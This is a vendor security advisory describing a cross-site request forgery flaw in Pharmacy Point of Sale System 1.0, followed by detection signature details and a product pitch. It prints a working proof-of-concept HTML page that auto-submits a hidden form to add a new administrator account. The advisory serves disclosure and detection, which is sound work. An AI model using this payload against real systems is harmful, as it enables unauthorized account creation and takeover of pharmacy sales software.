Application Details
Pharmacy Point of Sale System is a web-based application which assists with all sales transactions, as well as day-to-day transactions with all customers. This application also monitors stock availability of all products sold.
Vulnerability
Pharmacy Point of Sale System is vulnerable to cross-site request forgery, caused by improper validation of user-supplied input.
Identification
By persuading an authenticated user to visit a malicious Web site, a remote attacker could send a malformed HTTP request to add new administrative users. An attacker could exploit this vulnerability to perform cross-site scripting attacks, Web cache poisoning, and other malicious activities.
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/pharmacy/Actions.php?a=save_user" method="POST">
<input type="hidden" name="id" value="" />
<input type="hidden" name="fullname" value="Mrt" />
<input type="hidden" name="username" value="NewAdmin" />
<input type="hidden" name="type" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>Detection
By turning this into traffic files and matching rules, we are able to detect attempts to create an admin user via CSRF.
Coverage
Idappcom has created signatures 8021954 and 8021955 along with traffic files.
References
Pharmacy Point of Sale System 1.0 - 'Add New User' Cross-Site Request Forgery - Exploit Database
Pharmacy Point of Sale System 1.0 Cross-Site Request Forgery - Packet Storm Security
Traffic IQ
If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional